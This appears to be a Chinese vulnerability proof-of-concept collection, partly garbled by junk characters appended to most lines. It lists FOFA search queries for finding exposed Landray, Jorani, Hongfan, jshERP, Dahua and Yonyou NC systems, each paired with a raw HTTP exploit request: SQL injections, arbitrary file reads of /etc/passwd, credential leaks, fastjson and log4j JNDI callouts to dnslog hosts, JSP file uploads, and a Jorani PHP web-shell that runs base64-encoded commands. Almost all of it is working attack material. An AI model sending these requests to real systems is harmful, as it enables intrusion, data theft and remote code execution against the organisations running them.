FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
+ R% |7 x6 v! A4 G) OGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1* R; M- Q- s5 O. Y+ e: d7 P K2 A
Host: 127.0.0.1$ f: j4 D; \+ T- M2 F
Pragma: no-cache5 Z! P( h! k2 s0 X* z3 l2 z+ O: d+ ~
Cache-Control: no-cache4 h; N2 h; m4 c& V2 I2 m2 T; ^
Upgrade-Insecure-Requests: 1$ Y4 ?4 f/ G0 @$ J$ @0 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( P$ u p- n- _ L8 Q1 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: `: G, x) C- }
Accept-Encoding: gzip, deflate* w, ]. s r/ s
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8: ~5 r4 M- i8 D* ]! U1 t4 N. v
Connection: close4 [4 ? ?; `; s
9 ]7 Q/ G8 u2 N# W3 t/ g/ v% E) p" e X
, q8 T! u8 U; L1 X12. Jorani < 1.0.2 远程命令执行
7 o( S J; |0 H* ]FOFA:title="Jorani"+ |/ W/ `4 `5 j8 g; z
第一步先拿到cookie! }. R4 C) ?" M8 E" Z
GET /session/login HTTP/1.1
( M- Y) Z6 v7 U" g# THost: 192.168.190.30
; F K# I4 B- [* ]User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
- [! ^. F9 Z" _ zConnection: close, e/ w. a1 T4 f4 u0 u3 |+ ^3 t
Accept-Encoding: gzip5 \5 w9 y. {3 C0 z+ P% S3 l. h, h
M3 Q" `) p; v; ^5 Y+ c/ R6 Q( g/ ^1 u0 c. Z6 V" x9 b
响应中csrf_cookie_jorani用于后续请求
w: s( u6 O$ FHTTP/1.1 200 OK
0 ?5 R; g; ~6 q* S( hConnection: close
* t u0 r: n x, h7 o, S' ^Cache-Control: no-store, no-cache, must-revalidate9 ?8 ]1 G9 Y x. e
Content-Type: text/html; charset=UTF-8
* s7 l- W' p, j! d3 UDate: Tue, 24 Oct 2023 09:34:28 GMT
# x# Y8 j U3 [0 I- G# T. L5 lExpires: Thu, 19 Nov 1981 08:52:00 GMT
; F. [6 D0 g! [Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT2 s, l" z7 X4 x5 R" I
Pragma: no-cache6 D: }! b x5 ?2 Z
Server: Apache/2.4.54 (Debian)
A3 ?2 p( N: P+ C- j, sSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
6 V3 g0 R0 [" lSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly% Y( ?. T/ {8 B9 Z0 g
Vary: Accept-Encoding
4 C( R, @$ ~( q9 E, x. g2 O6 o9 Y& k* }: F0 m( J/ [; ?5 V9 `
* G1 B& ]% M4 j- n8 K1 f3 j
POST请求,执行函数并进行base64编码8 e( j6 y" `" F; ^/ ^$ l3 A
POST /session/login HTTP/1.1
2 [7 ?+ a7 g# Q% Q% c8 E" k6 rHost: 192.168.190.30
' k: M P" K4 M, l! |, TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% A* c% p* M& `: r; y$ G* B
Connection: close( ]* ^0 G! ] ?. }4 }
Content-Length: 2527 m+ c5 f, x: L4 e) x
Content-Type: application/x-www-form-urlencoded& U. P! D L3 T# U6 P: J
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
. P6 Z. G- s( X, H' Y |Accept-Encoding: gzip$ K& c ^) T9 q$ b0 b
! r8 s0 c( M, v- s; y* u/ F
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
* y2 [+ J8 e, a2 U6 N: y' _. x% ^4 l
; m9 q. Q9 T/ d* R4 u; d
1 m ^& u1 z1 A6 f% S% y; f
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 R) J4 ~7 K& G7 S) M0 I+ {GET /pages/view/log-2023-10-24 HTTP/1.1
7 q6 Y& b. H. i( T8 c PHost: 192.168.190.30
* b, y& C7 s) }4 Y+ t @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# F$ S& q: |- }( x
Connection: close
" }5 O8 w- y8 _ f8 VCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r6 F8 M3 g K& o$ G
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
8 S' W: D* W1 U) U5 JX-REQUESTED-WITH: XMLHttpRequest$ s/ `' Q2 G# r* s9 z. r l
Accept-Encoding: gzip8 e; D7 e3 v5 [$ J0 |$ I; _5 `0 J: k9 p
9 y* X' b9 j6 L ?
6 D" F( x$ @( C
13. 红帆iOffice ioFileDown任意文件读取
w* |7 H' Q# V5 z% f) S, Y- HFOFA:app="红帆-ioffice"& K% t& V0 E0 a% P+ G, h$ Q
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
" X+ ?; @ t3 V% j# X/ cHost: x.x.x.x
2 W# P7 a9 \6 p' H+ S, [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 L3 _0 g+ n" j, Y% \; N; }. h
Connection: close
+ n$ Q& E: L. ?2 q, }/ Y. B* f2 zAccept: */*
9 A4 U' w" Z0 N' i `5 LAccept-Encoding: gzip
Y( B- _* t0 r! j( u7 _
3 v0 ?" u2 J8 Y
D1 ]; P; u" g! ~( p2 ?14. 华夏ERP(jshERP)敏感信息泄露
: M% \: C3 W/ S5 U2 eFOFA:body="jshERP-boot"
8 ?; \( u, P* H& n G泄露内容包括用户名密码
- n7 M9 C$ K$ Z0 O* QGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
: E- h6 E8 a8 BHost: x.x.x.x
% j" [. ?, z# z! g% @9 @ OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.365 k) ?% ~: v6 ?; u3 D2 F$ U8 |
Connection: close' L5 y- q- K9 b, J" ^
Accept: */*! }7 {/ A5 H) h- K7 F
Accept-Language: en
( I9 r" W' P4 I! JAccept-Encoding: gzip
8 x; x* t; E8 t& [$ T! F2 k8 M# D6 M2 b1 g! c
- R" ^" U2 B/ ^! T. @0 N b6 [% d15. 华夏ERP getAllList信息泄露8 G9 @. |$ F* r' W
CVE-2024-0490$ K8 s0 l* U1 l P6 F; H" _
FOFA:body="jshERP-boot"
, ^) Z- c3 x4 h. x0 q9 V泄露内容包括用户名密码4 C, g5 O: \3 }4 y
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
: L; \* N# t! }% UHost: 192.168.40.130:100
/ ^2 O% {0 `. `" B! K) cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
) R" c! R+ v( B/ q% e" |3 T/ Q( WConnection: close) T* V9 q6 M4 H3 U* C' p, b
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8& ?2 D& C4 C; L2 L
Accept-Language: en
9 I) V7 g" ^+ vsec-ch-ua-platform: Windows
* W# Y! M$ O7 b& {2 PAccept-Encoding: gzip
* _" L9 _( V) a( {7 Q" } ~
3 ? q/ ^8 }/ V9 ^! }
3 {' B" k6 P7 j. p; R0 R16. 红帆HFOffice医微云SQL注入
, i: N) {3 V8 x W" SFOFA:title="HFOffice"
6 C) Y9 F7 |3 ~3 a% ^poc中调用函数计算1234的md5值; U* x6 z$ Q& D! }: P
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
) I* a0 J5 V5 F% L- `9 d9 wHost: x.x.x.x" M9 K9 T6 ^8 W
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 Y2 m9 D# G" z
Connection: close5 R, j8 B! d* E5 N8 J
Accept: */*
& G+ _! V4 D, g8 vAccept-Language: en& x* y9 H" s6 e/ W: L! E& u1 I
Accept-Encoding: gzip2 ^' q2 Z5 Y2 Q3 H
/ K, ~6 u8 g8 T9 F4 B/ Y% P% ?- p1 V
5 C4 c# N8 f8 [. q$ ?17. 大华 DSS itcBulletin SQL 注入6 f! Y. b: |. L8 f
FOFA:app="dahua-DSS"* S1 i& j7 o1 s8 I ]
POST /portal/services/itcBulletin?wsdl HTTP/1.1) K/ N& Y" {# v' a3 u
Host: x.x.x.x/ ~( O' |, s# [( h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) k( }- T& I% p, V0 N W, `, N- GConnection: close
2 V* O& ~( Y4 {. V* NContent-Length: 345
3 z7 V# |' e. V5 yAccept-Encoding: gzip) Y! u" _. Q4 Z! i4 S8 a& g& e1 s
$ G' J4 w# B2 }$ z+ z d
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
& v; `; J0 m/ [1 d- m<s11:Body>
}" H* |' M5 o9 T3 e5 s <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>& e* w ~7 d- K: W' C6 T, g
<netMarkings>1 @+ i1 p* A0 }( c5 _
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
: l: Q6 u$ [. w4 N* z- d0 N </netMarkings>
% Z6 _5 r$ G4 W L$ O& K0 B& ? </ns1:deleteBulletin>. g5 w" j2 Q! P9 b) K# T ]9 ?
</s11:Body>
! l- V& I0 q6 ]5 O6 d2 m! W5 `</s11:Envelope>) T# L3 U. s' b; m r! @; a
. d4 h- m7 F* l- m/ s; ^, N2 C3 r6 _( d0 Y" C$ k" a
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露- m8 V& k8 E6 C* V, V* L G
FOFA:app="dahua-DSS"
/ ^/ o' @5 P* G3 F, KGET /admin/cascade_/user_edit.action?id=1 HTTP/1.12 P3 G$ K. {# y3 I
Host: your-ip8 S8 B! {6 u8 l5 X; z8 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
. R2 t! r9 n7 N# g$ l! {Accept-Encoding: gzip, deflate4 f: F9 @9 h7 _9 p7 B: ?
Accept: */*3 m! N. O. g) I& x
Connection: keep-alive
. W! J8 T3 l4 Z# J- Z: I2 g3 F7 a9 c( {
' F8 H' i* x9 Z8 A- ?' n2 W
. L" V1 R7 ~- r9 u9 R. a$ k! i9 _1 G3 g19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* K6 K! O4 n& M5 Y/ M, d
FOFA:app="dahua-DSS"( w4 c* U6 q4 c1 O8 o7 E
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.15 A. D) e4 r3 l0 s, g0 i
Host:& v/ l- _' ]# A7 q. a
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.361 ?- [) L2 J0 q3 ?4 f0 n
Accept-Encoding: gzip, deflate# N$ E8 l2 J5 f ] ]" o/ O3 }
Accept: */*
3 r" M8 M9 @% u8 h) nConnection: keep-alive6 ` C- H1 |- _9 R: n2 {
4 Q; p5 h- M, h. t
7 V0 T4 ]2 X( w: n20. 大华ICC智能物联综合管理平台任意文件读取+ A4 T! P- S) N# j9 a' C' U7 d
FOFA:body="*客户端会小于800*"
& ~7 M) V2 T- rGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1! A. }7 r; m- n( K" s) G' z
Host: x.x.x.x
Q+ A8 A& [. m4 xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; Q8 o# d+ c& w- E* oConnection: close
# G& p4 h3 f' V3 |/ Y( a6 @. oAccept: */*2 q4 [: G/ _; l) P% V7 ~
Accept-Language: en. M, y- v5 W1 G2 I. S
Accept-Encoding: gzip5 O2 X1 h r) W
7 c: l" R5 g) R9 W1 Q' O
1 B) N+ K/ D1 g1 B21. 大华ICC智能物联综合管理平台random远程代码执行
* t$ V, P: Q7 b" x6 K& EFOFA:icon_hash="-1935899595"' Z H1 u/ ?( z- _4 E2 D
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 ?. G2 w8 c3 a' p7 U& Q
Host: x.x.x.x
5 K! E/ m5 ]4 r7 N8 h) A/ Q- O- eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# O- F% U9 |- WContent-Length: 161& e& W3 M0 l# d+ K e
Accept-Encoding: gzip9 m7 Q& L& v. t! T- X( M
Connection: close
4 \5 m2 \9 ], v# EContent-Type: application/json;charset=utf-8
( h: x& ?) k7 H$ Z) _2 n6 N% ?0 E5 w
{' {; x. `2 V, k4 V
"a":{ n5 b; i- I9 z; N* o
"@type":"com.alibaba.fastjson.JSONObject",& S# a6 a9 g6 y6 O8 [& M
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"} B& Z* S2 ]# B+ Y) G9 i
}"") F4 }1 u# k( N5 u: }
}# w. Z3 `( i6 Y9 b6 s% d
% [' n. j1 C8 L8 L
4 T% k% s5 d% }' }. ?0 m
22. 大华ICC智能物联综合管理平台 log4j远程代码执行 h$ m) ^ n% A$ |
FOFA:icon_hash="-1935899595"
, r* J, A7 y1 d3 p. SPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.13 K; t7 |4 a6 b0 C5 F1 J# K
Host: your-ip, e4 k4 \/ x. t. O! t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. E: }. z, k& `0 ~
Content-Type: application/json;charset=utf-8
/ C7 y9 N! x4 l# D: X) O3 h& H' h+ B& A7 M: i
{
7 c6 K* T# d! }/ d"loginName":"${jndi:ldap://dnslog}"
' E, X4 ~3 B2 K( e) p! C}' F& @: I8 n3 Z6 M3 H
) S) |. H8 G, @8 w/ g( `% o& ?& B, ^8 _1 f: {1 b
$ b' J% C' t& t% c1 w; f' h23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
6 D a2 ^; h, V8 N+ UFOFA:icon_hash="-1935899595"4 i( J3 x- b! ^' t9 u4 Z: G- I4 a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
: M$ g/ C$ x. u/ l- t/ Y' EHost: your-ip8 A- X0 D6 {9 @$ q7 u* J9 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, Y2 L0 x# q/ O6 [2 z
Content-Type: application/json;charset=utf-8( V3 D3 f# N0 m0 X9 K: z
Accept-Encoding: gzip" k8 R* r0 B) C1 u
Connection: close b7 L: _3 q3 b3 \* K# i' U
6 m7 x. r( ]3 }" `# Y
{
) O& O( C2 O! C8 \& u, V0 A' S "a":{# I) L/ z) F ]% x* b/ R7 M
"@type":"com.alibaba.fastjson.JSONObject",9 U6 n3 i" s' s7 l" C# ~4 z+ I6 g
{"@type":"java.net.URL","val":"http://DNSLOG"}
/ D4 C( r6 I4 T9 @" L4 L6 t6 _ }""2 F3 F) C5 c0 q8 Y
}
. z) G" F; C* w+ }6 d- k- p {) b/ g; j' C
# H4 A1 f6 y/ w! J24. 用友NC 6.5 accept.jsp任意文件上传" H6 _2 {' Q( I
FOFA:icon_hash="1085941792"
8 d0 w) i: A. c6 p7 pPOST /aim/equipmap/accept.jsp HTTP/1.1
$ R0 B. P; n, K2 A5 a, I1 E: |Host: x.x.x.x$ v# g4 M1 J: Q" ?8 T$ F
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36* j9 N3 s! b4 ^' @
Connection: close4 Z% W% x$ K( v; U0 z7 u
Content-Length: 449! t$ Q% X- g5 r/ }
Accept: */*" g! Y9 Z* ?; X
Accept-Encoding: gzip+ X- m g6 ?; I' @/ k
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
7 z6 H+ g! i2 B. s: g2 h3 u8 y- v( X: a) c2 D6 L( a9 r8 V& G6 t, R# U0 h
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
y" C# ?, w: B9 jContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
5 o. y+ i! q! m/ V5 G5 H0 t! Q1 f8 hContent-Type: text/plain: r% a) P7 q- @) l4 K2 @
; S, F+ m1 j0 q3 B
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
0 C' @$ b6 J1 {1 D-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# U, K3 Q# d/ }8 Q' R8 W+ Y
Content-Disposition: form-data; name="fname"
5 P# Q3 |& G x
* z; @( l( G. F3 f0 S7 M- m\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
6 V; L" {: |+ v-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--( g( G5 ^$ G4 ~) o
, w9 d' J9 x. Y
. [/ B: H* C1 E* C+ `# v+ v, Q25. 用友NC registerServlet JNDI 远程代码执行2 m3 A3 b- Y9 t9 ~$ i+ [( h
FOFA:app="用友-UFIDA-NC"
4 E1 z, }* m% H( w6 Z/ pPOST /portal/registerServlet HTTP/1.1+ {' @0 F2 i" S6 B; q, ~& Z
Host: your-ip; b4 x6 P9 T" Q- A# Z8 i( d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
3 a6 e y9 k" q1 tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
0 X: X$ [" o1 D- lAccept-Encoding: gzip, deflate
, z8 [; E# d: q8 P) S+ k& cAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6& f# T# b2 d# i- y4 y
Content-Type: application/x-www-form-urlencoded. x, r, x1 D% u4 g
+ G: H& M/ W# ~/ X
type=1&dsname=ldap://dnslog# Z/ |6 K* w; m
- Z6 j6 J- Y. n0 z
! N# B; x: e/ i( O3 [* V
9 \% d, P; g* V1 l$ y& ^26. 用友NC linkVoucher SQL注入
( g3 P' k( x! b! N1 K2 `& rFOFA:app="用友-UFIDA-NC"! ~4 e' R) G% `8 Z
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.10 [" w7 {" _) |9 W1 r
Host: your-ip7 m. M# c( G5 n2 @: z6 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 S& e* B7 m0 a/ _' G6 FContent-Type: application/x-www-form-urlencoded) ]2 q( d3 T U$ @
Accept-Encoding: gzip, deflate* x' f; v& ^. |, r
Accept: */*; u' q6 \' r" q
Connection: keep-alive
/ X9 c; a+ ]3 t) B" R3 O0 x" ~: v. n
+ q: O, ^6 i6 S. c4 o- j! p; [+ X; ^
27. 用友 NC showcontent SQL注入
* R9 H8 z) a4 U' E2 XFOFA:icon_hash="1085941792"
3 J* Z# ^) O% P3 @# T6 u" b$ A! CGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1* b/ z5 u& j$ X% A
Host: your-ip
" \+ E0 F7 B# Q& sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 H# h9 b8 ?" T; H$ K+ K
Accept-Encoding: identity0 t1 U& [; O& V% C* h2 v t+ {- ^
Connection: close8 F5 ]( _! ^4 y8 k4 j; T4 K
Content-Type: text/xml; charset=utf-8
: v0 G0 ], a% W9 g8 |; B ]( E- n# d% [' R5 c2 K9 X- M- _4 T
/ V7 k! {3 ?; u28. 用友NC grouptemplet 任意文件上传; y4 T: X! U/ u; z6 M1 j/ O# o+ a- l
FOFA:icon_hash="1085941792"
2 w' p- g/ v3 v; `9 ?POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.17 [$ z* E8 Q. `+ k7 [' Y
Host: x.x.x.x, S6 t8 k( H+ ?% Y* O8 r& U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36& I$ u# t8 [( r- R: ]7 x9 N
Connection: close
' u: J" C5 X! b& F) b+ Q+ vContent-Length: 268
1 w C2 {1 e: T# }. P4 VContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
6 Y) h! I. @8 G2 hAccept-Encoding: gzip
! S ~. B; g7 C5 W; a4 k* U9 G5 y* c( [& O7 c' c8 R4 ^. X
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
9 P6 d6 E# N* G8 l4 l6 f* SContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
) Q7 [8 J* S8 ^6 z1 o gContent-Type: application/octet-stream
& x% P% V6 B4 _1 @9 ?
% I9 m: Y, `; Q3 Y' N( V<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
& F" w* x: v$ l* T! q# n------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--, P" | m; d* p" W- A
9 ^$ o4 V! k ?( E q! s: n ~* G$ `8 Y
/uapim/static/pages/nc/head.jsp1 z4 D5 g! M6 A* L
2 j/ X) o8 t( r* {4 F
29. 用友NC down/bill SQL注入/ Y0 B" G: I. s, @1 N ~$ C# u% e& I
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"" H6 i- U/ x5 O& S1 }' ]
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1. K& }+ K+ u' N0 N
Host: your-ip
6 P& J* N" S* d; h7 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 _, D* L+ @+ D! \7 J' f3 UContent-Type: application/x-www-form-urlencoded, \& `3 u7 I4 F( |* s* d
Accept-Encoding: gzip, deflate0 l& h, {$ `3 t( ?) @1 B
Accept: */*
! f5 I0 }6 D( M" @$ r) ^Connection: keep-alive( A' H0 y" M" ?. Y
$ i1 M( c* Z2 d* O
1 a" a7 E. g A9 D8 \
30. 用友NC importPml SQL注入
% [2 Q+ b# ]1 a2 PFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
g2 ?7 {5 C8 U8 E2 j' tPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1) F5 d: Y# Y! x; Z1 `0 D4 P* U7 b! _
Host: your-ip. M2 S( {1 ~* E0 }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V7 {* y% Y, Z; G- b4 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36/ U. n) ]* F; I" |. f
Connection: close
( X) x3 r f8 b7 T
. Z' M4 I% f8 B7 ~% V; k6 L; ]------WebKitFormBoundaryH970hbttBhoCyj9V
+ M+ T# }! m3 [% w* E: J. q9 DContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
( G7 `% r( u g/ X: p: w! KContent-Type: image/jpeg- ^8 Y( i6 j8 O- A+ B1 K
------WebKitFormBoundaryH970hbttBhoCyj9V--
" \/ [6 Z; t8 C$ A1 i% N+ w" R$ f8 f+ i4 [/ ~
! s* b. `& N7 l% ^, H- i31. 用友NC runStateServlet SQL注入
3 ], ?0 L6 p3 c8 `& ^, tversion<=6.54 f X; _/ j6 ~6 Z
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* x( j+ z% f" J. u0 a
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 s8 S7 g! I+ d% S; ]# JHost: host
" ~2 W% I* O+ q" T' CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36% ?7 |9 M; I7 x9 m6 ~$ I
Content-Type: application/x-www-form-urlencoded& ~3 [- N5 |4 `, }+ t
* K/ A% D; p$ n1 B% j& Z# J) Q/ ^( E) F+ ^9 ~' K+ _1 f( y+ P& m) B+ m
32. 用友NC complainbilldetail SQL注入
+ @3 |1 U" _ a9 x; cversion= NC633、NC65' I" A2 c8 K, q p8 \6 [- N( M
FOFA:app="用友-UFIDA-NC"
) n' b7 u( V0 A' z! P8 dGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1 `; e- A9 t" a- ?8 z5 z5 {
Host: your-ip$ r$ G3 u6 _6 e+ T( V: }) C* y( |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 \% Z; z) T$ z& [
Content-Type: application/x-www-form-urlencoded( z1 f5 X+ |$ k5 T# [
Accept-Encoding: gzip, deflate2 \8 r% k) n: ~2 X/ M
Accept: */*: n% m- `! E+ E+ T" R- m
Connection: keep-alive6 @- Y s6 S+ l2 t
_+ d L" V) B- z& V8 O! v. @
3 z7 _) \( _2 O& t3 Y33. 用友NC downTax/download SQL注入
. n' ~. Y' U) }version:NC6.5FOFA:app="用友-UFIDA-NC"
6 ^) @; d: b1 _$ mGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ d- Z3 r( {- i5 ?/ \% t8 QHost: your-ip7 x7 W; p; |. U, W! m) Q# z) o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 b: X0 [3 K* _; CContent-Type: application/x-www-form-urlencoded( `/ L. d+ f m! {$ G6 d: S
Accept-Encoding: gzip, deflate5 p( Z2 i* w8 R9 D: b O
Accept: */*
4 T6 H& b) R) |Connection: keep-alive
0 ?9 v& J8 I' a3 B" l- j- l' |$ K" q! k' I* W: R
4 _! q: S. L g0 o2 C0 F
34. 用友NC warningDetailInfo接口SQL注入
! @+ }9 V5 v0 I5 I" a3 K+ jFOFA:app="用友-UFIDA-NC"
2 x9 F, w. Z: r- B5 g8 CGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
' c7 C+ ^3 F& V+ y7 p, v/ c. uHost: your-ip
1 O& c2 k+ w$ }5 o; i! Q zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% W Z( |' y4 @- r; ^8 m7 y, YContent-Type: application/x-www-form-urlencoded
# P& M# R4 l7 ?2 FAccept-Encoding: gzip, deflate/ j; `9 l) L, K) F" r
Accept: */*
4 y6 g$ K7 h, ~. c* yConnection: keep-alive
6 W$ F' @; w* `
# B$ A5 ? g& K s$ h. p' X( r8 ?+ D
35. 用友NC-Cloud importhttpscer任意文件上传5 R9 Z0 Z1 f7 {0 n- z, h( m4 z
FOFA:app="用友-NC-Cloud"
